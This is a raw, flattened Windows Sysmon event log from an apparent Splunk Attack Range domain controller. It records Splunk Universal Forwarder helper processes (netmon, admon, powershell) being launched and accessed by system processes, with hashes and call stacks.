ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000030874Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:08.254{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-55E0-6008-F706-00000000A301}6880C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030873Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:08.254{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030872Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:08.254{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030871Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:08.254{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030870Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:08.254{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030869Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:08.254{7901BC46-4984-6008-0500-00000000A301}6401076C:\Windows\system32\csrss.exe{7901BC46-55E0-6008-F706-00000000A301}6880C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030868Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:08.254{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-55E0-6008-F706-00000000A301}6880C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000030867Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:08.114{7901BC46-55E0-6008-F706-00000000A301}6880C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000030891Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:09.879{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-55E1-6008-F906-00000000A301}1612C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030890Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:09.879{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030889Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:09.879{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030888Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:09.879{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030887Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:09.879{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030886Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:09.879{7901BC46-4984-6008-0500-00000000A301}640656C:\Windows\system32\csrss.exe{7901BC46-55E1-6008-F906-00000000A301}1612C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030885Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:09.879{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-55E1-6008-F906-00000000A301}1612C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000030884Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:09.739{7901BC46-55E1-6008-F906-00000000A301}1612C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000030883Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:09.223{7901BC46-55E0-6008-F806-00000000A301}59447752C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030882Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:09.066{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-55E0-6008-F806-00000000A301}5944C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030881Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:09.066{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030880Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:09.066{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030879Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:09.066{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030878Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:09.066{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030877Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:09.066{7901BC46-4984-6008-0500-00000000A301}640656C:\Windows\system32\csrss.exe{7901BC46-55E0-6008-F806-00000000A301}5944C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030876Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:09.066{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-55E0-6008-F806-00000000A301}5944C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000030875Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:08.926{7901BC46-55E0-6008-F806-00000000A301}5944C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000030901Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:10.691{7901BC46-55E2-6008-FA06-00000000A301}58443516C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030900Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:10.551{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-55E2-6008-FA06-00000000A301}5844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030899Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:10.551{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030898Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 